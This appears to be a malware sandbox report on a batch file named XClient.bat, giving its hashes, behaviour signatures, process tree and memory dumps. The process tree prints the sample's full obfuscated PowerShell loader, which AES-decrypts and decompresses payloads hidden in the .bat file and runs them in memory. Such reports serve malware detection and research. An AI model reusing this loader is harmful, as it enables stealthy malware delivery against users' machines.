Analysis
- max time kernel: 121s
- max time network: 123s
- platform: windows7_x64
- resource: win7-20240215-en
- resource tags: arch:x64, arch:x86, image:win7-20240215-en, locale:en-us, os:windows7-x64, system
- submitted: 22-05-2024 18:07
Static task: static1
Behavioral task: behavioral1
- Sample: XClient.bat
- Resource: win7-20240215-en
- 4 signatures
- 150 seconds
Behavioral task: behavioral2
- Sample: XClient.bat
- Resource: win10v2004-20240508-en
- 17 signatures
- 150 seconds
General
- Target: XClient.bat
- Size: 64KB
- MD5: b9ba38c08e5f9113c31434ae324b3a67
- SHA1: c5a03303b400dcac370989ba8e51e0b0a3c0622d
- SHA256: b32ef974fa3195e1e88e290cb4b98f156e8ec3a5a053a8c781ecc2a8e47bf408
- SHA512: a6960a62f1034441acce040366313c4e70563c4b57c8ca2fa30161e06f6489a86de7af52d3f5c5f69e806a8c0097ed7367e136070f40443cfe73945cb86d099c
- SSDEEP: 768:AO70rJOxpoeQhjCEqvimrMRLdJmmC5UXfs3NadfzteQCv/vFyVzgZpB+20JaaaTg:3CgSGNIfso7tqvFysTTdpePNKaAURYja
- Score: 1/10
Malware Config
Signatures
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (1 IoC)
  Processes: powershell.exe
  pid | process
  2312 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes: powershell.exe
  description | pid | process
  Token: SeDebugPrivilege | 2312 | powershell.exe
- Suspicious use of WriteProcessMemory (12 IoCs)
  Processes: cmd.exe, net.exe
  description | pid | process | target process
  PID 2328 wrote to memory of 2204 | 2328 | cmd.exe | net.exe
  PID 2328 wrote to memory of 2204 | 2328 | cmd.exe | net.exe
  PID 2328 wrote to memory of 2204 | 2328 | cmd.exe | net.exe
  PID 2204 wrote to memory of 2208 | 2204 | net.exe | net1.exe
  PID 2204 wrote to memory of 2208 | 2204 | net.exe | net1.exe
  PID 2204 wrote to memory of 2208 | 2204 | net.exe | net1.exe
  PID 2328 wrote to memory of 1028 | 2328 | cmd.exe | cmd.exe
  PID 2328 wrote to memory of 1028 | 2328 | cmd.exe | cmd.exe
  PID 2328 wrote to memory of 1028 | 2328 | cmd.exe | cmd.exe
  PID 2328 wrote to memory of 2312 | 2328 | cmd.exe | powershell.exe
  PID 2328 wrote to memory of 2312 | 2328 | cmd.exe | powershell.exe
  PID 2328 wrote to memory of 2312 | 2328 | cmd.exe | powershell.exe
Processes (process tree; indentation shows parent/child depth)
- C:\Windows\system32\cmd.exe (depth 1)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\XClient.bat"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (depth 2)
    Command line: net file
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (depth 3)
      Command line: C:\Windows\system32\net1 file
  - C:\Windows\system32\cmd.exe (depth 2)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BtOk9w8o5AaasA3bULFmu6lzZU3YsXiJgOkhZu5Ls94='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5VSAd5R0G23+J6h8QdUPsw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $JoEHY=New-Object System.IO.MemoryStream(,$param_var); $xGFrj=New-Object System.IO.MemoryStream; $jBGtG=New-Object System.IO.Compression.GZipStream($JoEHY, [IO.Compression.CompressionMode]::Decompress); $jBGtG.CopyTo($xGFrj); $jBGtG.Dispose(); $JoEHY.Dispose(); $xGFrj.Dispose(); $xGFrj.ToArray();}function execute_function($param_var,$param2_var){ $nZTyZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $cFMlz=$nZTyZ.EntryPoint; $cFMlz.Invoke($null, $param2_var);}$DYtQC = 'C:\Users\Admin\AppData\Local\Temp\XClient.bat';$host.UI.RawUI.WindowTitle = $DYtQC;$vVoJL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($DYtQC).Split([Environment]::NewLine);foreach ($wnWAJ in $vVoJL) { if ($wnWAJ.StartsWith('rLSCSMNubfwqFDjMCNvM')) { $KKhqP=$wnWAJ.Substring(20); break; }}$payloads_var=[string[]]$KKhqP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix
Downloads
- memory/2312-4-0x000007FEF566E000-0x000007FEF566F000-memory.dmp (Filesize: 4KB)
- memory/2312-5-0x000000001B510000-0x000000001B7F2000-memory.dmp (Filesize: 2.9MB)
- memory/2312-6-0x0000000002240000-0x0000000002248000-memory.dmp (Filesize: 32KB)
- memory/2312-7-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmp (Filesize: 9.6MB)
- memory/2312-8-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmp (Filesize: 9.6MB)
- memory/2312-9-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmp (Filesize: 9.6MB)
- memory/2312-10-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmp (Filesize: 9.6MB)
- memory/2312-11-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmp (Filesize: 9.6MB)
- memory/2312-12-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmp (Filesize: 9.6MB)
- memory/2312-13-0x000007FEF566E000-0x000007FEF566F000-memory.dmp (Filesize: 4KB)